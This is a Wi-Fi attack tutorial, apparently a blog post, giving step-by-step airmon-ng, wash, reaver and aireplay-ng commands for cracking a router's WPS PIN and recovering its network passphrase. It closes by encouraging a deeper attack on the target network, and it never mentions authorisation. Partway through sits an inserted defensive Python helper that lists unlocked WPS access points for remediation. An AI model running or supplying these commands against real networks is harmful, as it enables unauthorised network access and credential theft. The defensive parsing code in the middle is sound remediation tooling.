Pixie Dust Attack
Let’s start!
Enable wireless card monitor mode -
Assuming you have a capable card, let’s switch it from
managed to monitor mode. Kill all processes that can interrupt monitor mode:
# airmon-ng check kill
Enable monitor mode:
# airmon-ng start wlan0
If you don’t know which interface your wireless card is,
issue the command iwconfig or ifconfig or ip addr show.
Wireless interfaces are
marked IEEE 802.11bgn. Your wireless card would probably be named wlan0 or
something similar.
Airmon will create a new interface called wlan0mon, which is
your wlan0 but in monitor mode.
We will use wash command to find a WPS vulnerable access
point.
# wash -i wlan0mon
If you encounter the error [!] Found packet with bad FCS, skipping..., try:
# wash -i wlan0mon --ignore-fcs
Wash will then show APs with WPS enabled. Now if you see a
WPS Locked with No value, that means the AP is WPS vulnerable.
Select your target AP and take note of its BSSID and
Channel.
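If you are running wash over your own estate to find access points that still need WPS switched off, reading the listing by eye gets tedious. The following Python helper is an added example, not part of the original post or of the wash tool: it parses a saved wash listing into records and returns the APs that still answer WPS with the lock not set, so they can be scheduled for remediation. The column layout (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID) and the sample lines are assumptions constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of a saved wash listing. Column layout is assumed
# (BSSID, Channel, RSSI, WPS Version, WPS Locked, ESSID); BSSIDs are made-up
# locally administered addresses, ESSIDs are invented.
SAMPLE_WASH_OUTPUT = """\
[constructed banner line]

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------
02:00:00:00:00:01       6            -45        1.0               No                Guest Net
02:00:00:00:00:02      11            -60        1.0               Yes               Office
02:00:00:00:00:03       1            -71        1.0               No                Lab AP 2
"""

# One AP row: MAC, channel, RSSI, WPS version, Locked flag, then the ESSID
# (which may itself contain spaces, so it takes the rest of the line).
AP_ROW = re.compile(
    r"^([0-9A-Fa-f]{2}(?::[0-9A-Fa-f]{2}){5})\s+"   # BSSID
    r"(\d+)\s+(-?\d+)\s+(\S+)\s+(Yes|No)\s*(.*)$"   # Ch, RSSI, Ver, Locked, ESSID
)


@dataclass
class WpsAccessPoint:
    bssid: str
    channel: int
    rssi: int
    wps_version: str
    locked: bool
    essid: str


def parse_wash(text: str) -> List[WpsAccessPoint]:
    """Turn a wash listing into records; banner, header, separator and blank
    lines do not start with a MAC address and are skipped."""
    aps = []
    for line in text.splitlines():
        m = AP_ROW.match(line.strip())
        if not m:
            continue
        bssid, ch, rssi, ver, locked, essid = m.groups()
        aps.append(WpsAccessPoint(bssid.upper(), int(ch), int(rssi),
                                  ver, locked == "Yes", essid.strip()))
    return aps


def wps_remediation_list(aps: List[WpsAccessPoint]) -> List[WpsAccessPoint]:
    """APs with WPS enabled and the lock not set, i.e. the state the post calls
    vulnerable; these should have WPS disabled in their admin interface."""
    return sorted((ap for ap in aps if not ap.locked),
                  key=lambda ap: (ap.essid, ap.bssid))
```

Feed it the output of wash saved to a file; each record in the returned list identifies an AP by BSSID and ESSID so the owner can locate and reconfigure it.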
Launch the attack -
Now that we have the valuable data of our target AP, we can
proceed on launching the attack:
reaver -i wlan0mon -b <BSSID> -c <channel> -a -vv
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv
where -a tells reaver to automatically adjust based on the
target’s behaviour and -vv is for verbosity.
Check reaver --help for more
options.
Some wireless cards, like the Alfa AWUS036NH I used,
encounter an association error. You can fix this by opening another terminal
and doing the association with:
# aireplay-ng -1 0 -a <BSSID> <interface>
Then modify your reaver command by adding -A argument,
meaning that the association is done in a separate process:
# reaver -i wlan0mon -b C0:C1:C0:E7:D1:81 -c 11 -a -vv -A
Another thing to look out for is when you get M5 right away
and get a timeout error when sending the M6 message.
It might be that the target
AP indeed has WPS enabled but is not configured.
Don’t waste your time on this
AP, I’ve tried it and reaver will never get the PIN.
If you’re receiving NACK messages, it means the AP is responding
to WPS requests as expected.
It will take around 10 hours or even days depending on the
signal strength for reaver to crack the PIN.
The good thing is you can pause
reaver (Ctrl+C) and resume the attack at another time. You can leave Reaver
running during the night if you wish.
Once Reaver has cracked the PIN, it will show the PSK of the
AP. You can now connect to it and perform a deeper attack on the target
network.
Have a safe hack.